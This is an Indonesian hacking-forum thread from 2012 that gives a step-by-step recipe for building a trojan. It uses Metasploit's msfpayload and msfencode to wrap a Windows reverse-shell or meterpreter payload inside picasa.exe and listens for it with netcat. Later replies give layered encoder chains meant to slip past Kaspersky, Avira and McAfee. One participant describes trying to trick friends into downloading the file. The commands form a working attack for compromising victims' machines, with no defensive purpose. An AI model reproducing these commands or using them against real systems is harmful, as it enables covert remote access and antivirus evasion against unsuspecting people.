[share]encode trojan menggunakan metasploit - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: [share]encode trojan menggunakan metasploit (/thread-4066.html) Pages:
1
2
|
[share]encode trojan menggunakan metasploit - amanojaku - 11-23-2012 permisi mi2n,mo2d dan kawan2 IBT semua,ijin bikin thread ye , btw ni thread pertama ane ,, sebelumnya sory kalo rada acak2an . sesuai judul ,kali ini kita akan coba membuat trojan yang akan kita encode dengan menggunakan msfencode di metasploit :d,tujuanya agar file trojan yang kita bikin tersamarkan dan tidak mudah terdeksi sama antivirus maupun korban, =)) here we go ... \m/ pertama2 bahan yang kita butuhkan adalah : 1.metasploit (sudah include di backtrack) 2.msfpayload (include di metasploit ) 3.msfencode (include di metasploit ) 4.file .exe yang akan kita gunakan untuk "membungkus" trojan yang kita buat (yang saya gunakan picasa.exe) langkah pertama : buka terminal,masuk ke direktory metasploit Code: ketik cd /opt/metasploit/msf3 Spoiler! :
kedua : bikin payload dengan menggunakan msfpayload kemudian encode menggunakan msfencode, Code: root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.59.2 LPORT=4444 R | ./msfencode -a x86 -e x86/shikata_ga_nai -t exe -x /root/picasa.exe > /root/Desktop/picasa.exe ket: - payl0ad yang saya pake windows/shell_reverse_tcp - LHOST : ip saya - LPORT : port listener saya - encoding menggunakan ./msfencode - dengan arsitektur (-a) x86 (32bit) - menggunakan encoder (-e) x86/shikata_ga_nai - hasil output (-t) exe - hasil output saya simpan di Desktop dengan nama picasa.exe (> /root/Desktop /picasa.exe) dan enter,tunggu proses,setelah jadi akan tampak seperti gambar berikut Spoiler! :
sebelumnya kita aktifkan dulu mode listener di terminal dengan netcat Code: nc -l -v -p 4444 Spoiler! :
*tambahan untuk melihat opsi pada msfencode dapat menggunakan perintah ./msfencode -h Code: root@bt:/opt/metasploit/msf3# ./msfencode -h dan untuk melihat list yang ada pada msfencode dapat menggunakan perintah ./msfencode -l Code: root@bt:/opt/metasploit/msf3# ./msfencode -l sekian, semoga bermanfaat RE: [share]encode trojan menggunakan metasploit - iKONspirasi - 11-24-2012 thx udah share disini bro RE: [share]encode trojan menggunakan metasploit - ardian - 11-24-2012 itu masih kedetec antivirus ga ? aku dah coba bikin, sampe aku ubah hexa nya tetep kedetek soalnya . itu antivirus ya bropake apa kok bisa ga kedetec ?? RE: [share]encode trojan menggunakan metasploit - amanojaku - 11-24-2012 (11-24-2012, 04:44 AM)konspirasi Wrote: thx udah share disini brosama2 om (11-24-2012, 05:32 AM)ardian Wrote: itu masih kedetec antivirus ga ?coba encodernya di lapis2 bro ,, contoh: Code: root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.59.2 LPORT=4444 R | ./msfencode -a x86 -e x86/shikata_ga_nai -c 4 -b -t raw | ./msfencode -a x86 -e x86/jmp_call_additive -c 4 -t raw | ./msfencode -a x86 -c 4 -t exe -x /root/picasa.exe > /root/Desktop/picasa.exe btw ane ngecek nya pake virustotal om .. , RE: [share]encode trojan menggunakan metasploit - 2s4u4b3h4an - 11-24-2012 wahh ini yang di tunggu2 good share om RE: [share]encode trojan menggunakan metasploit - amanojaku - 11-24-2012 (11-24-2012, 01:23 PM)2s4u4b3h4an Wrote: wahh ini yang di tunggu2sip, di coba om .... RE: [share]encode trojan menggunakan metasploit - ardian - 11-28-2012 ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,, RE: [share]encode trojan menggunakan metasploit - xsan-lahci - 11-29-2012 (11-28-2012, 11:35 PM)ardian Wrote: ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,, coba gunakan cara ini xsan@ibt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/picasa.exe keterangan : 1. Membuka sesi meterpreter. 2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.160.37.199 dan mendengarkan pada port 4444 3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text) 4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit) 5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code. 6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai 7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali 8. msfencode meingkatkan verbose level 9. msfencode menyimpan payload dalam format RAW 10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor 11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali 12 x86/call4_dword_xor menyimpan payload dalam format RAW 13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive 14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali 15. msfencode melakukan encoding dengan format ektensi .exe 16. File di beri nama Picasa.exe pada direktori /tmp/ Thanks t0 : red-dragon setau ane kaspersky emng paling good masbro rada sulit.. RE: [share]encode trojan menggunakan metasploit - amanojaku - 11-30-2012 (11-29-2012, 12:34 AM)xsan-lahci Wrote:(11-28-2012, 11:35 PM)ardian Wrote: ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,, iya ternyata,,,setelah ane coba pake kaspersky lngsung ke detect virus RE: [share]encode trojan menggunakan metasploit - aristateles - 12-26-2012 (11-30-2012, 08:39 PM)amanojaku Wrote:(11-29-2012, 12:34 AM)xsan-lahci Wrote:(11-28-2012, 11:35 PM)ardian Wrote: ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,, ane nyoba upload ke 4shred.com Terus ane hasut temen ane buat download, ga ada yang berani. Nama file-nya padahal udah racing.exe ,soalnya ke detect virus sama McAfee. Ada cara biar ga ke detect ga ?. |